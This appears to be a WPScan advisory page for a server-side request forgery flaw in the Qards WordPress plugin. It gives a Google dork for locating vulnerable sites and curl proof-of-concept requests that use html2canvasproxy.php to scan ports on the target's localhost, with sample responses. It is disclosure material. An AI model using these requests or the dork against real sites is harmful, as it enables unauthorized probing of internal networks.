Qards - Server Side Request Forgery (SSRF)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Google Dork: inurl:"plugins/qards"

Qards provides you easy option to drag and edit every part and element of your site in the front-end, you will never have to write any code to change the layout or to change any part of the site like the traditional WordPress way.
Proof of Concept
The vulnerable script http://target/wp-content/plugins/qards/html2canvasproxy.php
get the value of the "url" parameter and, using CURL PHP functions, saves the website's content to a file at /wp-content/plugins/qards/images/.

Using this feature, an attacker could check if a specific TCP port is listening on the target localhost or local network by parsing different response messages.


POC:

# An open 22/tcp port:
$ curl -s 'http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://127.0.0.1:22'
console.log("error: html2canvas-proxy-php: This request did not return a HTTP response valid");

# A closed 1234/tcp port:
$ curl -s 'http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://127.0.0.1:1234'
console.log("error: html2canvas-proxy-php: SOCKET: Connection refused(111)");

Affects Plugin

References

URL https://designmodo.com/qards/
URL https://github.com/brcontainer/html2canvas-php-proxy/issues/27

Classification

Type SSRF
OWASP Top 10 A5: Security Misconfiguration
CWE CWE-918

Miscellaneous

Submitter theMiddle
Submitter Twitter https://twitter.com/Menin_TheMiddle
Views 152
Verified No
WPVDB ID 8933

Timeline

Publicly Published 2017-10-11 (about 1 month ago)
Added 2017-10-17 (about 1 month ago)
Last Updated 2017-10-17 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.